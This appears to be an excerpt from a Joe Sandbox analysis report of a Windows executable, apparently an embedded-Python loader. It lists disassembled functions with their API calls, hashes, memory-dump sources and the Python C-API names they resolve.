Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 3fa5782cfb2183db67c02a04b7434ffaaeaabc0e7720b4c91186d2d3ad08411e
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 9D11C171A18A8181DA208F29A8142697765BB85BF5F544331FF7D8B7E9CE7CD0158700

Function 00007FF6B9F2A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: 512b3264abccd329aa7775a452b25c97201274f7ff75bf6a7b537268e7492da5
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: 32E08650F0C64252FF145FBB54952383158AF847A3F054035EB1DC72A1DE3CA8858310

Function 00007FF6B9F2ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC36
GetLastError.KERNEL32(?,?,?,00007FF6B9F2AA45,?,?,00000000,00007FF6B9F2AAFA), ref: 00007FF6B9F2AC40

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: 84d3a478d89b2d190fce0a413e4f0ca67f1d0c7232cecda021be7dfd1f122380
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: F2216F21B1C6C242FAA49F699590379368E9F847B6F094239FB2EC73D5CE7CE4458301

Function 00007FF6B9F2BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2BF44

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: e67232def70fa55fa56adabe1b4fad2f336a587335884d8567687d852b7dd81f
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 5641B23291828187EA34DF6DA54037977A8EB56BA6F100135EB8EC76D1CF3DE502CB51

Function 00007FF6B9F17F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6B9F1802A

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 1e24cc1f21cbc5d23192e9d74751cede06163928856a51bbdacdb3ed0e8e5f47
Instruction ID: f9b6db9aa867ec675e2f8407fc25848344e02f783b5d28898bd7d3fe0f445e5c
Opcode Fuzzy Hash: 1e24cc1f21cbc5d23192e9d74751cede06163928856a51bbdacdb3ed0e8e5f47
Instruction Fuzzy Hash: 2521F361B086B686FA109F2B66003BAA659BF47BE5F8C4030EF0C87786CE3DE0418640

Function 00007FF6B9F2B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2BA32

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 67fabbbfb9de933cb546baee5dd33cc0a6eaee0df5fd85bead2c642512795a98
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 5B316F31E2869285E7515F6D884137C3658AB81BB7F514239FF6D833D2CEBCE4418B11

Function 00007FF6B9F299D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6B9F299FF

Part of subcall function 00007FF6B9F29AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF6B9F29B1D
Part of subcall function 00007FF6B9F29AF8: GetProcAddress.KERNEL32 ref: 00007FF6B9F29B33
Part of subcall function 00007FF6B9F29AF8: FreeLibrary.KERNEL32 ref: 00007FF6B9F29B5A

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: f5ca07c8c73167b233278cce2ccd56dde1edcba4a534f77d2f46ff20c9499bc1
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 1C216B36A0478A8AEB248F68C4843EC33B8EB04739F541635E72D87AD6DF38D584CB40

Function 00007FF6B9F26004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F25F69

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 6fa72d510ac2b52eb9e7dabce780b9d496eb64c58645c1271f6cbe49e2895430
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: A0112E22A2C7C282EB609F59940137EB2ACAF85BA5F554031FB4CD7A96DF7DD5408701

Function 00007FF6B9F363C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F363E7

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: a16b878d8f9bc7bad4a9867ae9082fb04db46b2abedc329dc4e18f4e0ccbf167
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: B8216F72A1CA8686DB718F6CD48137976A4EB84BB5F244234EB9DC76D9DF3DD4008B01

Function 00007FF6B9F2042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F20480

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 7b44969c58d0839089edb9f04bc29d8a04f9cda4c76d102c320c4d10a5f83206
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 4101C422A0878140EA04DF5A9901679B699BF86FF1F2C8631FF5C97BD6CE3CE1018300

Function 00007FF6B9F27F6C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F27FAA

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction ID: 0c92e11222cd8b341bd11b7a04fd23c1ead94a1457aa456a407b479753ba12da
Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
Instruction Fuzzy Hash: A5013920A2D2C241FE606F2955013B97198AF447B2F148635FB1CC36EADE3CF4418651

Function 00007FF6B9F282A8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F282C1

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction ID: 67288f0d8ff22aedbb0f62bdfa883c3cb14c635697f1eb44a51fcbaa86ecd31e
Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
Instruction Fuzzy Hash: 65E0ECA4E1968786FA143FAD498237931185F95762F414430FB09972D3DE7CA8495622

Function 00007FF6B9F2EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF6B9F2B39A,?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA), ref: 00007FF6B9F2EC5D

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: 19ce7a14e54629dc8b9b3f2c9fd7ab1253ea19c66de66bb27eac62e54ef95a07
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 37F06254B4968781FE595EAD54613B5278E5F84BA2F6C4430EF0DC73D1DD7CE480C211

Function 00007FF6B9F2D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6B9F20D00,?,?,?,00007FF6B9F2236A,?,?,?,?,?,00007FF6B9F23B59), ref: 00007FF6B9F2D6AA

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 082a22ae3916d8b4d485d9f0ac801f95ea3e696107d558da18071657ae0f0a4d
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 24F03A10A0E68685FA646E79592177426984F947BAF084230EB2EC76C2DE7CA4848120

Non-executed Functions

Function 00007FF6B9F15820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15830
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15842
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15879
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1588B
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158A4
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158B6
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158CF
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158E1
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F158FD
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1590F
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1592B
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1593D
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15959
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F1596B
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15987
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F15999
GetProcAddress.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F159B5
GetLastError.KERNEL32(?,00007FF6B9F164BF,?,00007FF6B9F1336E), ref: 00007FF6B9F159C7

Strings

Py_ExitStatusException, xrefs: 00007FF6B9F1589A, 00007FF6B9F158BC
PyImport_ImportModule, xrefs: 00007FF6B9F15C2F, 00007FF6B9F15C51
PyModule_GetDict, xrefs: 00007FF6B9F15CB9, 00007FF6B9F15CDB
PyUnicode_Replace, xrefs: 00007FF6B9F15FC7, 00007FF6B9F15FE9
PyObject_CallFunction, xrefs: 00007FF6B9F15CE7, 00007FF6B9F15D09
PyErr_NormalizeException, xrefs: 00007FF6B9F15AED, 00007FF6B9F15B0F
PyObject_CallFunctionObjArgs, xrefs: 00007FF6B9F15D15, 00007FF6B9F15D37
PyObject_GetAttrString, xrefs: 00007FF6B9F15D43, 00007FF6B9F15D65
Py_IsInitialized, xrefs: 00007FF6B9F15921, 00007FF6B9F15943
PyUnicode_AsUTF8, xrefs: 00007FF6B9F15EB3, 00007FF6B9F15ED5
PyConfig_InitIsolatedConfig, xrefs: 00007FF6B9F159AB, 00007FF6B9F159CD
PyUnicode_FromString, xrefs: 00007FF6B9F15F6B, 00007FF6B9F15F8D
PyConfig_Clear, xrefs: 00007FF6B9F1597D, 00007FF6B9F1599F
PyErr_Fetch, xrefs: 00007FF6B9F15ABF, 00007FF6B9F15AE1
PyErr_Print, xrefs: 00007FF6B9F15B49, 00007FF6B9F15B6B
PyErr_Restore, xrefs: 00007FF6B9F15B77, 00007FF6B9F15B99
PyUnicode_FromFormat, xrefs: 00007FF6B9F15F3D, 00007FF6B9F15F5F
Failed to get address for %hs, xrefs: 00007FF6B9F15851
PyObject_SetAttrString, xrefs: 00007FF6B9F15D71, 00007FF6B9F15D93
Py_Finalize, xrefs: 00007FF6B9F158C5, 00007FF6B9F158E7
Py_InitializeFromConfig, xrefs: 00007FF6B9F158F3, 00007FF6B9F15915
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6B9F15DCD, 00007FF6B9F15DEF
PyConfig_SetBytesString, xrefs: 00007FF6B9F15A07, 00007FF6B9F15A29
Py_PreInitialize, xrefs: 00007FF6B9F1594F, 00007FF6B9F15971
PyImport_AddModule, xrefs: 00007FF6B9F15BD3, 00007FF6B9F15BF5
PyConfig_SetWideStringList, xrefs: 00007FF6B9F15A63, 00007FF6B9F15A85
PyUnicode_Join, xrefs: 00007FF6B9F15F99, 00007FF6B9F15FBB
PyEval_EvalCode, xrefs: 00007FF6B9F15BA5, 00007FF6B9F15BC7
GetProcAddress, xrefs: 00007FF6B9F15858
PyUnicode_DecodeFSDefault, xrefs: 00007FF6B9F15F0F, 00007FF6B9F15F31
Py_DecRef, xrefs: 00007FF6B9F15826, 00007FF6B9F15848
PyRun_SimpleStringFlags, xrefs: 00007FF6B9F15DFB, 00007FF6B9F15E1D
PyErr_Occurred, xrefs: 00007FF6B9F15B1B, 00007FF6B9F15B3D
PyErr_Clear, xrefs: 00007FF6B9F15A91, 00007FF6B9F15AB3
PyImport_ExecCodeModule, xrefs: 00007FF6B9F15C01, 00007FF6B9F15C23
PyMarshal_ReadObjectFromString, xrefs: 00007FF6B9F15C5D, 00007FF6B9F15C7F
PyMem_RawFree, xrefs: 00007FF6B9F15C8B, 00007FF6B9F15CAD
PyConfig_SetString, xrefs: 00007FF6B9F15A35, 00007FF6B9F15A57
PyUnicode_Decode, xrefs: 00007FF6B9F15EE1, 00007FF6B9F15F03
PyStatus_Exception, xrefs: 00007FF6B9F15E29, 00007FF6B9F15E4B
PyConfig_Read, xrefs: 00007FF6B9F159D9, 00007FF6B9F159FB
PySys_GetObject, xrefs: 00007FF6B9F15E57, 00007FF6B9F15E79
PyObject_Str, xrefs: 00007FF6B9F15D9F, 00007FF6B9F15DC1
PySys_SetObject, xrefs: 00007FF6B9F15E85, 00007FF6B9F15EA7
Py_DecodeLocale, xrefs: 00007FF6B9F1586F, 00007FF6B9F15891

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 64833a748f52ec33650faa21729608440059ea37befe9707632ec92fc8b0c4cf
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 1122A6A4A0DB1791FA259F7EA86417423A8AF157B7F459035CB2E83360FF3CB1588352

